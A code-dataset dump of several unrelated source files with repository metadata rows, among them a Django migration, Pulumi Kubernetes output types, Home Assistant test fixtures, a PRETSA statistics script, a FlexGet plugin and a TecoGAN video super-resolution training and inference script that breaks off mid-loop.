            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AlterField(
            model_name='pluginscriptrow',
            name='pluginscript_data',
            field=models.TextField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='pluginscriptrow',
            name='pluginscript_data_string',
            field=models.TextField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='pluginscriptrow',
            name='pluginscript_name',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='pluginscriptrow',
            name='submission_and_script_name',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='pluginscriptsubmission',
            name='plugin',
            field=models.CharField(max_length=255),
        ),
    ]
| 31.364583
| 74
| 0.562936
|
4a0ea911014c9ce3b689a6797efbb3b2dc8ede0c
| 6,434
|
py
|
Python
|
sdk/python/pulumi_kubernetes/scheduling/v1/outputs.py
|
sunbing81/pulumi-kubernetes
|
8de6b379b00e2ab95b24bc176de8b329c670d7cd
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_kubernetes/scheduling/v1/outputs.py
|
sunbing81/pulumi-kubernetes
|
8de6b379b00e2ab95b24bc176de8b329c670d7cd
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_kubernetes/scheduling/v1/outputs.py
|
sunbing81/pulumi-kubernetes
|
8de6b379b00e2ab95b24bc176de8b329c670d7cd
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by pulumigen. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from ... import meta as _meta
__all__ = [
'PriorityClass',
]
@pulumi.output_type
class PriorityClass(dict):
    """
    PriorityClass defines mapping from a priority class name to the priority integer value. The value can be any valid integer.
    """
    def __init__(__self__, *,
                 value: int,
                 api_version: Optional[str] = None,
                 description: Optional[str] = None,
                 global_default: Optional[bool] = None,
                 kind: Optional[str] = None,
                 metadata: Optional['_meta.v1.outputs.ObjectMeta'] = None,
                 preemption_policy: Optional[str] = None):
        """
        PriorityClass defines mapping from a priority class name to the priority integer value. The value can be any valid integer.
        :param int value: The value of this priority class. This is the actual priority that pods receive when they have the name of this class in their pod spec.
        :param str api_version: APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources
        :param str description: description is an arbitrary string that usually provides guidelines on when this priority class should be used.
        :param bool global_default: globalDefault specifies whether this PriorityClass should be considered as the default priority for pods that do not have any priority class. Only one PriorityClass can be marked as `globalDefault`. However, if more than one PriorityClasses exists with their `globalDefault` field set to true, the smallest value of such global default PriorityClasses will be used as the default priority.
        :param str kind: Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
        :param '_meta.v1.ObjectMetaArgs' metadata: Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
        :param str preemption_policy: PreemptionPolicy is the Policy for preempting pods with lower priority. One of Never, PreemptLowerPriority. Defaults to PreemptLowerPriority if unset. This field is beta-level, gated by the NonPreemptingPriority feature-gate.
        """
        pulumi.set(__self__, "value", value)
        if api_version is not None:
            # generated code pins apiVersion to its schema constant, ignoring
            # the passed-in value (it only gates whether the key is set)
            pulumi.set(__self__, "api_version", 'scheduling.k8s.io/v1')
        if description is not None:
            pulumi.set(__self__, "description", description)
        if global_default is not None:
            pulumi.set(__self__, "global_default", global_default)
        if kind is not None:
            # same pattern: kind is pinned to the constant 'PriorityClass'
            pulumi.set(__self__, "kind", 'PriorityClass')
        if metadata is not None:
            pulumi.set(__self__, "metadata", metadata)
        if preemption_policy is not None:
            pulumi.set(__self__, "preemption_policy", preemption_policy)
    @property
    @pulumi.getter
    def value(self) -> int:
        """
        The value of this priority class. This is the actual priority that pods receive when they have the name of this class in their pod spec.
        """
        return pulumi.get(self, "value")
    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[str]:
        """
        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources
        """
        return pulumi.get(self, "api_version")
    @property
    @pulumi.getter
    def description(self) -> Optional[str]:
        """
        description is an arbitrary string that usually provides guidelines on when this priority class should be used.
        """
        return pulumi.get(self, "description")
    @property
    @pulumi.getter(name="globalDefault")
    def global_default(self) -> Optional[bool]:
        """
        globalDefault specifies whether this PriorityClass should be considered as the default priority for pods that do not have any priority class. Only one PriorityClass can be marked as `globalDefault`. However, if more than one PriorityClasses exists with their `globalDefault` field set to true, the smallest value of such global default PriorityClasses will be used as the default priority.
        """
        return pulumi.get(self, "global_default")
    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """
        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
        """
        return pulumi.get(self, "kind")
    @property
    @pulumi.getter
    def metadata(self) -> Optional['_meta.v1.outputs.ObjectMeta']:
        """
        Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
        """
        return pulumi.get(self, "metadata")
    @property
    @pulumi.getter(name="preemptionPolicy")
    def preemption_policy(self) -> Optional[str]:
        """
        PreemptionPolicy is the Policy for preempting pods with lower priority. One of Never, PreemptLowerPriority. Defaults to PreemptLowerPriority if unset. This field is beta-level, gated by the NonPreemptingPriority feature-gate.
        """
        return pulumi.get(self, "preemption_policy")
    def _translate_property(self, prop):
        # maps camelCase schema names to snake_case attribute names via the
        # shared _tables lookup; unknown names pass through unchanged
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
| 56.938053
| 425
| 0.708579
|
4a0ea9d9d5fe51b46df18ee9dab28f7cbf13f952
| 1,791
|
py
|
Python
|
tests/conftest.py
|
firstof9/ha-openei
|
ac01f6756b846591049d629249d11a0d1edfb867
|
[
"MIT"
] | 7
|
2021-09-08T14:46:11.000Z
|
2021-11-14T18:14:09.000Z
|
tests/conftest.py
|
firstof9/ha-openei
|
ac01f6756b846591049d629249d11a0d1edfb867
|
[
"MIT"
] | 44
|
2021-09-03T22:09:21.000Z
|
2021-12-15T17:21:25.000Z
|
tests/conftest.py
|
firstof9/ha-openei
|
ac01f6756b846591049d629249d11a0d1edfb867
|
[
"MIT"
] | 1
|
2021-09-04T13:15:51.000Z
|
2021-09-04T13:15:51.000Z
|
"""Test configurations."""
from unittest.mock import patch
import pytest
pytest_plugins = "pytest_homeassistant_custom_component"
@pytest.fixture(autouse=True)
def auto_enable_custom_integrations(enable_custom_integrations):
    # Applied to every test automatically. `enable_custom_integrations` is
    # presumably provided by pytest-homeassistant-custom-component (declared
    # via pytest_plugins above) — it lets HA load this repo's integration.
    yield
@pytest.fixture(name="mock_api")
def mock_api():
"""Mock the library calls."""
with patch("custom_components.openei.openeihttp.Rates") as mock_api:
# mock_api = mock.Mock(spec=openeihttp.Rates)
mock_api.return_value.current_rate = 0.24477
mock_api.return_value.distributed_generation = "Net Metering"
mock_api.return_value.approval = True
mock_api.return_value.rate_name = 0.24477
mock_api.return_value.mincharge = (10, "$/month")
mock_api.return_value.lookup_plans = (
'"Fake Utility Co": [{"name": "Fake Plan Name", "label": "randomstring"}]'
)
yield mock_api
@pytest.fixture(name="mock_api_config")
def mock_api_config():
"""Mock the library calls."""
with patch("custom_components.openei.config_flow.openeihttp.Rates") as mock_api:
mock_return = mock_api.return_value
mock_return.lookup_plans.return_value = {
"Fake Utility Co": [{"name": "Fake Plan Name", "label": "randomstring"}]
}
yield mock_return
@pytest.fixture(name="mock_sensors")
def mock_get_sensors():
"""Mock of get sensors function."""
with patch("custom_components.openei.get_sensors", autospec=True) as mock_sensors:
mock_sensors.return_value = {
"current_rate": 0.24477,
"distributed_generation": "Net Metering",
"approval": True,
"rate_name": "Fake Test Rate",
"mincharge": 10,
"mincharge_uom": "$/month",
}
yield mock_sensors
| 31.421053
| 86
| 0.663875
|
4a0eab4e9b90c2dad613e8f934993478c7ef0615
| 80
|
py
|
Python
|
scotty/version.py
|
huandy/python-scotty
|
b8d1925db881adaf06ce3c532ab3a61835dce6a8
|
[
"Apache-2.0"
] | 2
|
2015-10-19T14:56:00.000Z
|
2016-08-19T13:42:50.000Z
|
scotty/version.py
|
huandy/python-scotty
|
b8d1925db881adaf06ce3c532ab3a61835dce6a8
|
[
"Apache-2.0"
] | 3
|
2016-03-02T09:18:47.000Z
|
2021-03-25T21:39:00.000Z
|
scotty/version.py
|
huandy/python-scotty
|
b8d1925db881adaf06ce3c532ab3a61835dce6a8
|
[
"Apache-2.0"
] | 5
|
2015-11-29T04:28:37.000Z
|
2017-07-18T08:51:59.000Z
|
# Single source of truth for the package version.
__version_info__ = (0, 1, 7)
# Dotted version string rendered from the tuple, e.g. "0.1.7".
__version__ = '.'.join(str(part) for part in __version_info__)
| 26.666667
| 50
| 0.7
|
4a0eac88f6a70ad48033a76571c9c1d79d021428
| 2,075
|
py
|
Python
|
calculateAnnotationsEventLog_pretsa.py
|
jkoessle/PRETSA
|
93435f1ab37a87a96487496c9facae51971bcfd1
|
[
"MIT"
] | null | null | null |
calculateAnnotationsEventLog_pretsa.py
|
jkoessle/PRETSA
|
93435f1ab37a87a96487496c9facae51971bcfd1
|
[
"MIT"
] | null | null | null |
calculateAnnotationsEventLog_pretsa.py
|
jkoessle/PRETSA
|
93435f1ab37a87a96487496c9facae51971bcfd1
|
[
"MIT"
] | null | null | null |
import sys
import pandas as pd
import csv
import os
import numpy as np
class excel_semicolon(csv.excel):
    # csv dialect identical to the Excel defaults except for a ';' delimiter
    delimiter = ';'
# Aggregate per-activity mean durations from PRETSA result files into one
# semicolon-separated statistics CSV. Expects the result directory as argv[1].
dictPath = sys.argv[1]
writeFilePath = dictPath + "pretsa_statistics_annotations.csv"
# newline="" lets csv.DictWriter control row terminators itself (csv docs);
# without it, Windows writes doubled \r\n line endings.
with open(writeFilePath, 'w+', newline='') as writeFile:
    caseIDColName = "Case ID"
    datasets = ["Road_Traffic_Fine_Management_Process","CoSeLoG","Sepsis"]
    fieldNamesWrite = ["Event Log","k","t","method","activity","Avg. Duration"]
    writer = csv.DictWriter(writeFile, fieldnames=fieldNamesWrite, dialect=excel_semicolon)
    writer.writeheader()
    # t-threshold strings exactly as they appear in the result file names
    # (loop-invariant: hoisted out of the k loop)
    tString = ["0.1","0.07500000000000001","0.05","0.024999999999999994"]
    for dataset in datasets:
        # k values 2, 4, ..., 256 (was `for k in range(1,9): k = 2 ** k`,
        # which shadowed the loop variable)
        for k in (2 ** exponent for exponent in range(1, 9)):
            for idx in range(0, 4):
                filePath = dictPath + dataset + "_duration_t" + tString[idx] + "_k" + str(k) + "_pretsa.csv"
                t = round(0.1 - (idx*0.025), 3)
                if os.path.isfile(filePath):
                    try:
                        eventLog = pd.read_csv(filePath, delimiter=";")
                        # -1.0 is used as a missing-value marker in the input
                        eventLog = eventLog.replace(-1.0,np.nan)
                        if not eventLog.empty:
                            data = eventLog.groupby('Activity').Duration.agg("mean")
                            # fix: Series.iteritems() was removed in pandas 2.0;
                            # .items() is the drop-in replacement
                            for key, value in data.items():
                                line = dict()
                                line["Event Log"] = dataset
                                line["k"] = k
                                line["t"] = str(t)
                                line["method"] = "pretsa"
                                line["activity"] = key
                                line["Avg. Duration"] = value
                                writer.writerow(line)
                    except pd.errors.EmptyDataError:
                        # NOTE(review): message lacks a space before "and" —
                        # kept byte-identical to the original output
                        print("Dataset " + dataset + " with k = " + str(k) + "and t = " + str(t) + " is empty")
                else:
                    print(filePath + " does not exist")
| 46.111111
| 112
| 0.470843
|
4a0eaccda3694abdb3af0309f302d9ba07b676fb
| 741
|
py
|
Python
|
flexget/plugins/generic/log_start.py
|
sillygreen89/Flexget
|
60f24ab0dda7b94c87ba43451921c50c3cef391f
|
[
"MIT"
] | 1
|
2018-05-02T21:14:50.000Z
|
2018-05-02T21:14:50.000Z
|
flexget/plugins/generic/log_start.py
|
sillygreen89/Flexget
|
60f24ab0dda7b94c87ba43451921c50c3cef391f
|
[
"MIT"
] | null | null | null |
flexget/plugins/generic/log_start.py
|
sillygreen89/Flexget
|
60f24ab0dda7b94c87ba43451921c50c3cef391f
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals, division, absolute_import
from builtins import * # pylint: disable=unused-import, redefined-builtin
import logging
import os
from argparse import SUPPRESS
from flexget import options
from flexget.event import event
log = logging.getLogger('log_start')
@event('manager.startup')
def log_on_start(manager):
    """Log a startup message (with PID) when --log-start was given."""
    if manager.options.log_start:
        # lazy %-args: the logging module formats only if the record is emitted
        log.info('FlexGet started (PID: %s)', os.getpid())
@event('manager.shutdown')
def log_on_shutdown(manager):
    """Log a shutdown message (with PID) when --log-start was given."""
    if manager.options.log_start:
        # lazy %-args: the logging module formats only if the record is emitted
        log.info('FlexGet stopped (PID: %s)', os.getpid())
@event('options.register')
def register_options():
    # --log-start is an internal flag: help=SUPPRESS keeps it out of --help.
    options.get_parser().add_argument('--log-start', action='store_true', help=SUPPRESS)
| 25.551724
| 88
| 0.74224
|
4a0ead224f0868d84bfae8f883f9a5e18b8a6ebd
| 22,072
|
py
|
Python
|
main_good.py
|
ginsongsong/TecoGAN
|
9f3b4b76d5098ce07c2594eac8979c6536c50ea9
|
[
"Apache-2.0"
] | null | null | null |
main_good.py
|
ginsongsong/TecoGAN
|
9f3b4b76d5098ce07c2594eac8979c6536c50ea9
|
[
"Apache-2.0"
] | null | null | null |
main_good.py
|
ginsongsong/TecoGAN
|
9f3b4b76d5098ce07c2594eac8979c6536c50ea9
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import os, math, time, collections, numpy as np
''' TF_CPP_MIN_LOG_LEVEL
0 = all messages are logged (default behavior)
1 = INFO messages are not printed
2 = INFO and WARNING messages are not printed
3 = INFO, WARNING, and ERROR messages are not printed
Disable Logs for now '''
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
from tensorflow.python.util import deprecation
deprecation._PRINT_DEPRECATION_WARNINGS = False
import random as rn
#CV and scipy
import cv2 as cv
import scipy as signal
# fix all randomness, except for multi-treading or GPU process
os.environ['PYTHONHASHSEED'] = '0'
np.random.seed(42)
rn.seed(12345)
tf.set_random_seed(1234)
import tensorflow.contrib.slim as slim
import sys, shutil, subprocess
from lib.ops import *
from lib.dataloader import inference_data_loader, frvsr_gpu_data_loader
from lib.frvsr import generator_F, fnet
from lib.Teco import FRVSR, TecoGAN
Flags = tf.app.flags
Flags.DEFINE_integer('rand_seed', 1 , 'random seed' )
# Directories
Flags.DEFINE_string('input_dir_LR', None, 'The directory of the input resolution input data, for inference mode')
Flags.DEFINE_integer('input_dir_len', -1, 'length of the input for inference mode, -1 means all')
Flags.DEFINE_string('input_dir_HR', None, 'The directory of the input resolution input data, for inference mode')
Flags.DEFINE_string('mode', 'inference', 'train, or inference')
Flags.DEFINE_string('output_dir', None, 'The output directory of the checkpoint')
Flags.DEFINE_string('output_pre', '', 'The name of the subfolder for the images')
Flags.DEFINE_string('output_name', 'output', 'The pre name of the outputs')
Flags.DEFINE_string('output_ext', 'jpg', 'The format of the output when evaluating')
Flags.DEFINE_string('summary_dir', None, 'The dirctory to output the summary')
# Models
Flags.DEFINE_string('checkpoint', None, 'If provided, the weight will be restored from the provided checkpoint')
Flags.DEFINE_integer('num_resblock', 16, 'How many residual blocks are there in the generator')
# Models for training
Flags.DEFINE_boolean('pre_trained_model', False, 'If True, the weight of generator will be loaded as an initial point'
'If False, continue the training')
Flags.DEFINE_string('vgg_ckpt', None, 'path to checkpoint file for the vgg19')
# Machine resources
Flags.DEFINE_string('cudaID', '0', 'CUDA devices')
Flags.DEFINE_integer('queue_thread', 6, 'The threads of the queue (More threads can speedup the training process.')
Flags.DEFINE_integer('name_video_queue_capacity', 512, 'The capacity of the filename queue (suggest large to ensure'
'enough random shuffle.')
Flags.DEFINE_integer('video_queue_capacity', 256, 'The capacity of the video queue (suggest large to ensure'
'enough random shuffle')
Flags.DEFINE_integer('video_queue_batch', 2, 'shuffle_batch queue capacity')
# Training details
# The data preparing operation
Flags.DEFINE_integer('RNN_N', 10, 'The number of the rnn recurrent length')
Flags.DEFINE_integer('batch_size', 4, 'Batch size of the input batch')
Flags.DEFINE_boolean('flip', True, 'Whether random flip data augmentation is applied')
Flags.DEFINE_boolean('random_crop', True, 'Whether perform the random crop')
Flags.DEFINE_boolean('movingFirstFrame', True, 'Whether use constant moving first frame randomly.')
Flags.DEFINE_integer('crop_size', 32, 'The crop size of the training image')
# Training data settings
Flags.DEFINE_string('input_video_dir', '', 'The directory of the video input data, for training')
Flags.DEFINE_string('input_video_pre', 'scene', 'The pre of the directory of the video input data')
Flags.DEFINE_integer('str_dir', 1000, 'The starting index of the video directory')
Flags.DEFINE_integer('end_dir', 2000, 'The ending index of the video directory')
Flags.DEFINE_integer('end_dir_val', 2050, 'The ending index for validation of the video directory')
Flags.DEFINE_integer('max_frm', 119, 'The ending index of the video directory')
# The loss parameters
Flags.DEFINE_float('vgg_scaling', -0.002, 'The scaling factor for the VGG perceptual loss, disable with negative value')
Flags.DEFINE_float('warp_scaling', 1.0, 'The scaling factor for the warp')
Flags.DEFINE_boolean('pingpang', False, 'use bi-directional recurrent or not')
Flags.DEFINE_float('pp_scaling', 1.0, 'factor of pingpang term, only works when pingpang is True')
# Training parameters
Flags.DEFINE_float('EPS', 1e-12, 'The eps added to prevent nan')
Flags.DEFINE_float('learning_rate', 0.0001, 'The learning rate for the network')
Flags.DEFINE_integer('decay_step', 500000, 'The steps needed to decay the learning rate')
Flags.DEFINE_float('decay_rate', 0.5, 'The decay rate of each decay step')
Flags.DEFINE_boolean('stair', False, 'Whether perform staircase decay. True => decay in discrete interval.')
Flags.DEFINE_float('beta', 0.9, 'The beta1 parameter for the Adam optimizer')
Flags.DEFINE_float('adameps', 1e-8, 'The eps parameter for the Adam optimizer')
Flags.DEFINE_integer('max_epoch', None, 'The max epoch for the training')
Flags.DEFINE_integer('max_iter', 1000000, 'The max iteration of the training')
Flags.DEFINE_integer('display_freq', 20, 'The diplay frequency of the training process')
Flags.DEFINE_integer('summary_freq', 100, 'The frequency of writing summary')
Flags.DEFINE_integer('save_freq', 10000, 'The frequency of saving images')
# Dst parameters
Flags.DEFINE_float('ratio', 0.01, 'The ratio between content loss and adversarial loss')
Flags.DEFINE_boolean('Dt_mergeDs', True, 'Whether only use a merged Discriminator.')
Flags.DEFINE_float('Dt_ratio_0', 1.0, 'The starting ratio for the temporal adversarial loss')
Flags.DEFINE_float('Dt_ratio_add', 0.0, 'The increasing ratio for the temporal adversarial loss')
Flags.DEFINE_float('Dt_ratio_max', 1.0, 'The max ratio for the temporal adversarial loss')
Flags.DEFINE_float('Dbalance', 0.4, 'An adaptive balancing for Discriminators')
Flags.DEFINE_float('crop_dt', 0.75, 'factor of dt crop') # dt input size = crop_size*crop_dt
Flags.DEFINE_boolean('D_LAYERLOSS', True, 'Whether use layer loss from D')
FLAGS = Flags.FLAGS
# Set CUDA devices correctly if you use multiple gpu system
os.environ["CUDA_VISIBLE_DEVICES"]=FLAGS.cudaID
# Fix randomness
my_seed = FLAGS.rand_seed
rn.seed(my_seed)
np.random.seed(my_seed)
tf.set_random_seed(my_seed)
# Check the output_dir is given
if FLAGS.output_dir is None:
raise ValueError('The output directory is needed')
# Check the output directory to save the checkpoint
if not os.path.exists(FLAGS.output_dir):
os.mkdir(FLAGS.output_dir)
# Check the summary directory to save the event
if not os.path.exists(FLAGS.summary_dir):
os.mkdir(FLAGS.summary_dir)
# custom Logger to write Log to file
class Logger(object):
    """Tee writer: duplicates everything written to stdout into a logfile.

    Installed via ``sys.stdout = Logger()`` so all ``print`` output is
    persisted to <summary_dir>/logfile.txt as well.
    """
    def __init__(self):
        self.terminal = sys.stdout
        # append mode so repeated runs accumulate in the same logfile
        self.log = open(FLAGS.summary_dir + "logfile.txt", "a")
    def write(self, message):
        self.terminal.write(message)
        self.log.write(message)
    def flush(self):
        # fix: flush BOTH streams — the original flushed only the logfile,
        # so print(..., flush=True) never actually flushed the console
        self.terminal.flush()
        self.log.flush()
sys.stdout = Logger()
def printVariable(scope, key = tf.GraphKeys.MODEL_VARIABLES):
    """Print name and shape of every variable in `scope`, plus a total count."""
    print("Scope %s:" % scope)
    total_sz = 0
    for var in tf.get_collection(key, scope=scope):
        shape = var.get_shape().as_list()
        print("Variable: " + var.name)
        print("Shape: " + str(shape))
        total_sz += np.prod(shape)
    print("total size: %d" % total_sz)
def preexec(): # Don't forward signals.
    # Put the child into its own process group so signals sent to the
    # training process (e.g. Ctrl-C / SIGINT) are not forwarded to the
    # spawned inference subprocess (used as Popen's preexec_fn).
    os.setpgrp()
def testWhileTrain(FLAGS, testno = 0):
    '''
    this function is called during training, Hard-Coded!!
    to try the "inference" mode when a new model is saved.
    The code has to be updated from machine to machine...
    depending on python, and your training settings

    Launches a separate inference process against the checkpoint that was
    just saved (model-<testno>) and returns the Popen handle without waiting.
    '''
    desstr = os.path.join(FLAGS.output_dir, 'train/') # saving in the ./train/ directory
    # command line for the inference run, mirroring the relevant flags
    cmd1 = ["python3", "main.py", # never tested with python2...
        "--output_dir", desstr,
        "--summary_dir", desstr,
        "--mode","inference",
        "--num_resblock", "%d"%FLAGS.num_resblock,
        "--checkpoint", os.path.join(FLAGS.output_dir, 'model-%d'%testno),
        "--cudaID", FLAGS.cudaID]
    # a folder for short test
    cmd1 += ["--input_dir_LR", "./LR/calendar/", # update the testing sequence
        "--output_pre", "", # saving in train folder directly
        "--output_name", "%09d"%testno, # name
        "--input_dir_len", "10",]
    print('[testWhileTrain] step %d:'%testno)
    print(' '.join(cmd1))
    # ignore signals
    # preexec detaches the child process group so interrupting the trainer
    # does not kill this inference run; caller may wait() on the result
    return subprocess.Popen(cmd1, preexec_fn = preexec)
if False: # If you want to take a look of the configuration, True
print_configuration_op(FLAGS)
##############################################################################################
# the inference mode (just perform super resolution on the input image)
if FLAGS.mode == 'inference':
if FLAGS.checkpoint is None:
raise ValueError('The checkpoint file is needed to performing the test.')
# Declare the test data reader
cap=cv.VideoCapture(0)
fps = cap.get(cv.CAP_PROP_FPS)
cap.set(cv.CAP_PROP_FRAME_WIDTH, 360)
cap.set(cv.CAP_PROP_FRAME_HEIGHT, 240)
frame = cap.read()
if cap.isOpened():
width = cap.get(3)
height = cap.get(4)
inference_data = inference_data_loader(FLAGS)
#input_shape = [1,] + list(inference_data.inputs[0].shape)
input_shape = [1, int(height),int(width),3] # N H W C
output_shape = [1,input_shape[1]*4, input_shape[2]*4, 3]
oh = input_shape[1] - input_shape[1]//8 * 8
ow = input_shape[2] - input_shape[2]//8 * 8
paddings = tf.constant([[0,0], [0,oh], [0,ow], [0,0]])
print("input shape:", input_shape)
print("output shape:", output_shape)
# build the graph
inputs_raw = tf.placeholder(tf.float32, shape=input_shape, name='inputs_raw')
pre_inputs = tf.Variable(tf.zeros(input_shape), trainable=False, name='pre_inputs')
pre_gen = tf.Variable(tf.zeros(output_shape), trainable=False, name='pre_gen')
pre_warp = tf.Variable(tf.zeros(output_shape), trainable=False, name='pre_warp')
transpose_pre = tf.space_to_depth(pre_warp, 4)
inputs_all = tf.concat( (inputs_raw, transpose_pre), axis = -1)
with tf.variable_scope('generator'):
gen_output = generator_F(inputs_all, 3, reuse=False, FLAGS=FLAGS)
# Deprocess the images outputed from the model, and assign things for next frame
with tf.control_dependencies([ tf.assign(pre_inputs, inputs_raw)]):
outputs = tf.assign(pre_gen, deprocess(gen_output))
inputs_frames = tf.concat( (pre_inputs, inputs_raw), axis = -1)
with tf.variable_scope('fnet'):
gen_flow_lr = fnet( inputs_frames, reuse=False)
gen_flow_lr = tf.pad(gen_flow_lr, paddings, "SYMMETRIC")
gen_flow = upscale_four(gen_flow_lr*4.0)
gen_flow.set_shape( output_shape[:-1]+[2] )
pre_warp_hi = tf.contrib.image.dense_image_warp(pre_gen, gen_flow)
before_ops = tf.assign(pre_warp, pre_warp_hi)
print('Finish building the network')
# In inference time, we only need to restore the weight of the generator
var_list = tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope='generator')
var_list = var_list + tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope='fnet')
weight_initiallizer = tf.train.Saver(var_list)
# Define the initialization operation
init_op = tf.global_variables_initializer()
local_init_op = tf.local_variables_initializer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
if (FLAGS.output_pre == ""):
image_dir = FLAGS.output_dir
else:
image_dir = os.path.join(FLAGS.output_dir, FLAGS.output_pre)
if not os.path.exists(image_dir):
os.makedirs(image_dir)
numMonitorX = 2
numMonitorY = 2
with tf.Session(config=config) as sess:
# Load the pretrained model
sess.run(init_op)
sess.run(local_init_op)
print('Loading weights from ckpt model')
weight_initiallizer.restore(sess, FLAGS.checkpoint)
if False: # If you want to take a look of the weights, True
printVariable('generator')
print('Frame evaluation starts!!')
while(cap.isOpened()):
start = time.time()
ret , frame = cap.read()
#input_im = np.array(frame.astype(np.float32))
frame =frame/ 255.0 #np.max(frame)
input_im = np.expand_dims(frame.astype(np.float32),axis=0)
feed_dict={inputs_raw: input_im}
sess.run(before_ops, feed_dict=feed_dict)
output_frame = sess.run(outputs, feed_dict=feed_dict)
end = time.time()
seconds = end - start
cv.putText(output_frame[0],str(fps*seconds),(10,40),cv.FONT_HERSHEY_SIMPLEX,1, (0, 255, 255), 1, cv.LINE_AA)
cv.imshow("runtime result", output_frame[0])
frame = cv.resize(frame, (4* int(width), 4* int(height)), interpolation=cv.INTER_CUBIC)
cv.imshow("runtime src", frame)
if cv.waitKey(1) &0xFF ==ord('q'):
break
#print( "total time " + str(srtime) + ", frame number " + str(max_iter) )
###############################################################################################
# The training mode
elif FLAGS.mode == 'train':
# hard coded save
filelist = ['main.py','lib/Teco.py','lib/frvsr.py','lib/dataloader.py','lib/ops.py']
for filename in filelist:
shutil.copyfile('./' + filename, FLAGS.summary_dir + filename.replace("/","_"))
useValidat = tf.placeholder_with_default( tf.constant(False, dtype=tf.bool), shape=() )
rdata = frvsr_gpu_data_loader(FLAGS, useValidat)
# Data = collections.namedtuple('Data', 'paths_HR, s_inputs, s_targets, image_count, steps_per_epoch')
print('tData count = %d, steps per epoch %d' % (rdata.image_count, rdata.steps_per_epoch))
if (FLAGS.ratio>0):
Net = TecoGAN( rdata.s_inputs, rdata.s_targets, FLAGS )
else:
Net = FRVSR( rdata.s_inputs, rdata.s_targets, FLAGS )
# Network = collections.namedtuple('Network', 'gen_output, train, learning_rate, update_list, '
# 'update_list_name, update_list_avg, image_summary')
# Add scalar summary
tf.summary.scalar('learning_rate', Net.learning_rate)
train_summary = []
for key, value in zip(Net.update_list_name, Net.update_list_avg):
# 'map_loss, scale_loss, FrameA_loss, FrameA_loss,...'
train_summary += [tf.summary.scalar(key, value)]
train_summary += Net.image_summary
merged = tf.summary.merge(train_summary)
validat_summary = [] # val data statistics is not added to average
uplen = len(Net.update_list)
for key, value in zip(Net.update_list_name[:uplen], Net.update_list):
# 'map_loss, scale_loss, FrameA_loss, FrameA_loss,...'
validat_summary += [tf.summary.scalar("val_" + key, value)]
val_merged = tf.summary.merge(validat_summary)
# Define the saver and weight initiallizer
saver = tf.train.Saver(max_to_keep=50)
# variable lists
all_var_list = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
tfflag = tf.GraphKeys.MODEL_VARIABLES #tf.GraphKeys.TRAINABLE_VARIABLES
if (FLAGS.checkpoint is not None) and (FLAGS.pre_trained_model is True):
model_var_list = tf.get_collection(tfflag, scope='generator') + tf.get_collection(tfflag, scope='fnet')
assign_ops = get_existing_from_ckpt(FLAGS.checkpoint, model_var_list, rest_zero=True, print_level=1)
print('Prepare to load %d weights from the pre-trained model for generator and fnet'%len(assign_ops))
if FLAGS.ratio>0:
model_var_list = tf.get_collection(tfflag, scope='tdiscriminator')
dis_list = get_existing_from_ckpt(FLAGS.checkpoint, model_var_list, print_level=0)
print('Prepare to load %d weights from the pre-trained model for discriminator'%len(dis_list))
assign_ops += dis_list
if FLAGS.vgg_scaling > 0.0: # VGG weights are not trainable
vgg_var_list = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='vgg_19')
vgg_restore = tf.train.Saver(vgg_var_list)
print('Finish building the network.')
# Start the session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
# init_op = tf.initialize_all_variables() # MonitoredTrainingSession will initialize automatically
with tf.train.MonitoredTrainingSession(config=config, save_summaries_secs=None, save_checkpoint_secs=None) as sess:
train_writer = tf.summary.FileWriter(FLAGS.summary_dir, sess.graph)
printVariable('generator')
printVariable('fnet')
if FLAGS.ratio>0:
printVariable('tdiscriminator')
if FLAGS.vgg_scaling > 0.0:
printVariable('vgg_19', tf.GraphKeys.GLOBAL_VARIABLES)
vgg_restore.restore(sess, FLAGS.vgg_ckpt)
print('VGG19 restored successfully!!')
if (FLAGS.checkpoint is not None):
if (FLAGS.pre_trained_model is False):
print('Loading everything from the checkpoint to continue the training...')
saver.restore(sess, FLAGS.checkpoint)
# this will restore everything, including ADAM training parameters and global_step
else:
print('Loading weights from the pre-trained model to start a new training...')
sess.run(assign_ops) # only restore existing model weights
print('The first run takes longer time for training data loading...')
# get the session for save
_sess = sess
while type(_sess).__name__ != 'Session':
# pylint: disable=W0212
_sess = _sess._sess
save_sess = _sess
if 1:
print('Save initial checkpoint, before any training')
